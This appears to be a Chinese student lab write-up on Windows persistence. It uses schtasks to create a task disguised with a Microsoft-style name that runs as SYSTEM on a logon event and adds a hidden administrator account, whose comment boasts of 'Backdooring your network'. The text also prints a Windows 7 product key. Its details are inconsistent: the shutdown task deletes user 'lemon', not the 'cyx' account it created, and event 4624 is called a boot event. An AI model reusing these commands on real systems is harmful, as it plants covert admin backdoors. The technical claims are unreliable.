网络攻防任务二:开机、关机事件触发账户的创建与删除
一、任务要求
设计一个以开机、关机事件为触发条件的计划任务,实现:
1、开机时新建一个用户
2、关机时删除用户
二、解决步骤
(一)实验环境搭建
事件触发的命令是schtasks。
利用schtasks完成的功能主要是:利用确定的日志事件触发net user命令,以达到新增一个管理员账户的目的。
如果利用传统的at命令,首先无法用日志事件触发,其次需要执行多条命令行时,只能将它们编写成.bat的批处理文件进行处理。
由于要用到事件触发,xp没有这个功能,所以要新建一个win7的虚拟机。
Win7激活秘钥为YKHFT KW986 GK4PY FDWYH 7TP9F
(二)开机创建用户
Schtasks的用法描述:
允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任
务。
参数列表:
/Create 创建新计划任务。
/Delete 删除计划任务。
/Query 显示所有计划任务。
/Change 更改计划任务属性。
/Run 按需运行计划任务。
/End 中止当前正在运行的计划任务。
/ShowSid 显示与计划的任务名称相应的安全标识符。
/? 显示此帮助消息。
Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?
SCHTASKS /ShowSid /?
开机事件的事件ID为4624,因此代码如下:
schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"
直接在命令行窗口下输入这行代码即可。
重启的时候有登录窗口,原因是关机的时候账户未删。
(三)关机删除用户
经查询关机事件ID为1074。
代码如下:
schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"
关机之前先检查一下账户情况
重启之后,结果如下图所示,账户已被删除。
开机后,再输入net user,可以看到账户在开机之后也建立成功了。